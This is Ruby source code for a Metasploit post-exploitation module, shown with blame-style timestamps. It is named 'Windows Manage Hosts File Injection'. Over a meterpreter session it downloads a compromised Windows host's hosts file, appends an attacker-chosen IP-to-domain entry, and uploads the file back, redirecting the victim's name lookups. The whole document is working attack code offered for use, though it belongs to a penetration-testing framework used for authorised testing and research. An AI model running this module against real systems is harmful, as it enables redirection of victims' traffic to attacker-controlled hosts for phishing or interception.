2011-10-23 17:17:32 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-10-23 17:17:32 +00:00
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Post
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Windows Manage Hosts File Injection',
|
|
|
|
'Description' => %q{
|
|
|
|
This module allows the attacker to insert a new entry into the target
|
|
|
|
system's hosts file.
|
|
|
|
},
|
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
|
|
|
|
'Platform' => [ 'win' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('DOMAIN', [ true, 'Domain name for host file manipulation.' ]),
|
|
|
|
OptString.new('IP', [ true, 'IP address to point domain name to.' ])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2011-10-23 17:17:32 +00:00
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
|
|
|
if datastore['IP'].nil? or datastore['DOMAIN'].nil?
|
|
|
|
print_error("Please specify both DOMAIN and IP")
|
|
|
|
return
|
|
|
|
end
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
ip = datastore['IP']
|
|
|
|
hostname = datastore['DOMAIN']
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Get a temporary file path
|
|
|
|
meterp_temp = Tempfile.new('meterp')
|
|
|
|
meterp_temp.binmode
|
|
|
|
temp_path = meterp_temp.path
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
begin
|
|
|
|
# Download the remote file to the temporary file
|
|
|
|
client.fs.file.download_file(temp_path, 'C:\\WINDOWS\\System32\\drivers\\etc\\hosts')
|
2018-06-15 20:38:49 +00:00
|
|
|
rescue Rex::Post::Meterpreter::RequestError => re
|
2013-08-30 21:28:54 +00:00
|
|
|
# If the file doesn't exist, then it's okay. Otherwise, throw the
|
|
|
|
# error.
|
|
|
|
if re.result != 2
|
|
|
|
raise $!
|
|
|
|
end
|
|
|
|
end
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Inserting hosts file entry pointing #{hostname} to #{ip}..")
|
|
|
|
hostsfile = ::File.open(temp_path, 'ab')
|
|
|
|
hostsfile.write("\r\n#{ip}\t#{hostname}")
|
|
|
|
hostsfile.close()
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
client.fs.file.upload_file('C:\\WINDOWS\\System32\\drivers\\etc\\hosts', temp_path)
|
|
|
|
print_good("Done!")
|
|
|
|
end
|
2011-10-23 17:17:32 +00:00
|
|
|
end
|